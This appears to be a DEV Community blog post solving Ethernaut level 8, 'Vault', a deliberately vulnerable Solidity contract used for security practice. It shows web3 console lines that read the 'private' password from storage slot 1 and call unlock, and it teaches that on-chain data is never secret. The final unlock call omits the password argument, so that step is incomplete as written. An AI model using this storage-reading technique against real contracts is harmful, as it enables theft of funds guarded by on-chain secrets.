Naveen ⚡

Posted on Jan 21, 2022

Ethernaut Hacks Level 8: Vault

#solidity #ethereum #openzeppelin #smartcontract

This is the level 8 of Ethernaut game.

Pre-requisites

Layout of state variables in Solidity
Reading storage at a slot in contract

Hack

Given contract:

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Vault {
  bool public locked;
  bytes32 private password;

  constructor(bytes32 _password) public {
    locked = true;
    password = _password;
  }

  function unlock(bytes32 _password) public {
    if (password == _password) {
      locked = false;
    }
  }
}

player has to set locked to false.

Only way is by calling unlock by correct password.

Although password state variable is private, one can still read a storage variable by determining it's storage slot. Therefore sensitive information should not be stored on-chain, even if it is specified private.

Above, the password is at a storage slot of 1 in Vault.

Let's read it:

password = await web3.eth.getStorageAt(contract.address, 1)

Call unlock with password:

await contract.unlock()

Unlocked. Verify by:

await contract.locked() === false

And that's it.

Learned something awesome? Consider starring the github repo 😄

and following me on twitter here 🙏

Your AI Code Assistant

Ask anything about your entire project, code and get answers and even architecture diagrams. Built to handle large projects, Amazon Q Developer works alongside you from idea to production code.

Start free in your IDE

DEV Community

Ethernaut Hacks Level 8: Vault

Pre-requisites

Hack

Your AI Code Assistant

Top comments (0)

Your AI Code Assistant

Read next

NPM & Managing Dependencies

OTS: Your One-Time Secret Sharing Solution - Secure, Simple, and Self-Destructing!

What is Selenium? Exploring Its Open Source Ecosystem and Funding Models

Apache Mahout: A Deep Dive into Open Source Innovation and Funding Models